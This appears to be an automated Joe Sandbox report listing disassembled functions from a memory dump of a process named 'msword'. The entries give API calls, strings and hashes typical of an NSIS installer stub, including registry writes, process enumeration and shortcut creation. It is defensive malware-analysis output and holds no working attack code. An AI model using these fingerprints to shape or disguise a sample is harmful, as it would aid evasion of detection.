Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
@%F, xrefs: 0040682C
@%F, xrefs: 00406A53

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54

Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A

Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
lstrlenW.KERNEL32(?), ref: 004063CC
GetVersionExW.KERNEL32(?), ref: 0040642A

Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
FreeLibrary.KERNEL32(00000000), ref: 004064D4
GlobalFree.KERNEL32(?), ref: 004064DD

Strings

GetModuleBaseNameW, xrefs: 00406494
EnumProcesses, xrefs: 00406482
Unknown, xrefs: 004064FC
EnumProcessModules, xrefs: 0040648A
Kernel32.DLL, xrefs: 0040659B
Module32NextW, xrefs: 004065DE
Process32FirstW, xrefs: 004065BD
CreateToolhelp32Snapshot, xrefs: 004065B5
Module32FirstW, xrefs: 004065D3
PSAPI.DLL, xrefs: 00406464
Process32NextW, xrefs: 004065C8

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68

Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
GetDlgItem.USER32(?,000003E8), ref: 00404181
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
GetSysColor.USER32(?), ref: 004041AF
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
lstrlenW.KERNEL32(?), ref: 004041D6
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2

Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004

GetDlgItem.USER32(?,0000040A), ref: 0040424A
SendMessageW.USER32(00000000), ref: 00404251
GetDlgItem.USER32(?,000003E8), ref: 0040427E
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
SetCursor.USER32(00000000), ref: 004042D2
ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
SetCursor.USER32(00000000), ref: 004042F6
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337

Strings

N, xrefs: 0040426C
open, xrefs: 004042DF
@%F, xrefs: 004042A7

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: @%F$N$open
API String ID: 3928313111-3849437375
Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99

Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1

Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
wsprintfA.USER32 ref: 00406B4D
GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
GlobalFree.KERNEL32(00000000), ref: 00406C52
CloseHandle.KERNEL32(?), ref: 00406C5C

Strings

NUL, xrefs: 00406A9E
%s=%s, xrefs: 00406B43
[Rename], xrefs: 00406BC8, 00406BD7
F, xrefs: 00406AE8

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: F$%s=%s$NUL$[Rename]
API String ID: 565278875-1653569448
Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
